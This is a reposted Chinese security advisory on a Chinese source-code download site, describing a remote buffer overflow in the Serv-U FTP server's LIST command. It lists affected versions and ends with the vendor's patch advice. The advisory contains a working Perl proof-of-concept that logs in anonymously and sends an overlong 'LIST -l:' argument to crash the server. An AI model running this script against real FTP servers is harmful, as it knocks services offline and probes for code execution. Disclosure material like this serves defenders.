| VB 源码 | VC 源码 | ASP源码 | JSP源码 | PHP源码 | CGI源码 | FLASH源码 | 素材模板 | C 源程序 | 站长工具 | 站长教程 |

安全防范

木马病毒
黑客技术
系统安全
防火墙
安全防范

本类阅读TOP10

·双网卡共享上网解析
·常用端口对照详解
·技巧:多种途径访问局域网中的计算机
·代理服务器使用祥解
·在家远程控制公司的局域网电脑
·在Windows XP****享上网
·最新奇迹****复制漏洞大全(含98c)
·为什么局域网中机器PING通却不能上网?
·局域网共享资源安全防护大全
·远程破OICQ密码给工具QQExplorer ver 1.25介绍

站内搜索

Serv-U FTP服务器LIST命令超长-l参数远程缓冲区溢出漏洞
受影响系统:
RhinoSoft Serv-U 5.0
RhinoSoft Serv-U 4.1.0.3
RhinoSoft Serv-U 4.1.0.11
RhinoSoft Serv-U 4.0.0.4
RhinoSoft Serv-U 4.0.0.0
RhinoSoft Serv-U 5.0.0.4
    - Microsoft Windows XP
    - Microsoft Windows NT 4.0
    - Microsoft Windows 98
    - Microsoft Windows 2000
不受影响系统:
RhinoSoft Serv-U 5.0.0.9
描述:
--------------------------------------------------------------------------------
Serv-U是一个Windows平台下使用非常广泛的FTP服务器软件。

Serv-U在处理LIST命令对参数处理不正确,远程攻击者可以利用这个漏洞对FTP服务程序进行拒绝服务攻击,存在执行任意指令的可能。

攻击者利用LIST -l:命令,提交超长字符串给SERV-U,可触发缓冲区溢出,导致服务程序崩溃,精心构建提交数据可能以进程权限执行任意指令。

<*来源:storm (storm@stormdev.net)
  
  链接:http://www.securiteam.com/windowsntfocus/5ZP0G2KCKA.html
*>

测试方法:
--------------------------------------------------------------------------------
storm (storm@stormdev.net)提供了如下测试方法:

#!/usr/bin/perl

use IO::Socket;

$host = "192.168.1.243";

$remote = IO::Socket::INET->new ( Proto => "tcp",
     PeerAddr => $host,
     PeerPort => "2116",
    );

unless ($remote) { die "cannot connect to ftp daemon on $host" }

print "connected\n";
while (<$remote>)
{
print $_;
if (/220 /)
{
  last;
}
}

$remote->autoflush(1);

my $ftp = "USER anonymous\r\n";

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
print $_;
if (/331 /)
{
  last;
}
}

$ftp = join("", "PASS ", "a\@b.com", "\r\n");
print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
print $_;
if (/230 /)
{
  last;
}
}

my $ftp = join ("", "LIST -l:", "A"x(134), "\r\n");

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
print $_;
if (/250 Done/)
{
  last;
}
}

close $remote;

建议:
--------------------------------------------------------------------------------
厂商补丁:

RhinoSoft
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.serv-u.com/



相关文章
  • 安全性与IIS
  • 通过探测邮件服务器进行Email地址有效性检验
  • ASP.NET通过DSO访问分析服务器的权限问题
  • 黑客越来越多 如何设定安全log服务器呢?
  • 代理服务器软件冲突导致的网络故障分析
  • 使用网络地址转换实现多服务器负载均衡
  • 代理服务器使用祥解
  • 服务器版Longhorn把Unix逼入死境
  • 精确对时:增加Internet时间服务器
  • Linux下的代理服务器设置
  • 组网不求人!搭建简易Linux局网服务器
  • Win2000服务器轻松管
  • 插翅难逃 根据Web服务器的记录来追踪黑客
  • 插翅难逃 根据Web服务器的记录来追踪黑客
  • Web服务器安全指南
  • 提高IIS 5.0网站服务器的执行效率的八种方法
  • 提高IIS 5.0网站服务器的执行效率的八种方法
  • 如何让你的服务器支持asp.net
  • 第一章 熟悉JSP服务器
  • 169proxy服务器设置大全
  • 相关软件

  • 检测OLE服务器是否支持IConnect  
  • 类似WinGate的代理服务器源程序  
  • 多线程实现客户-服务器结构的一个例子  
  • NT服务器的App Wizard  
  • 该聊天程序包括服务器和客户端两部分  
  • 这是一个代理服务器程序它使用多线程  
  • MSDN中的HTTP服务器程序非常具有参  
  • 简单的虚拟代理服务器的源程序  
  • TelNet服务器的源程序  
  • 用TCP/IP服务器客户端通讯源代码  

  • 下载首页关于我们广告服务联系方式常见问题隐私声明法律条款本站声明下载帮助发布软件站点地图谷歌卫星地图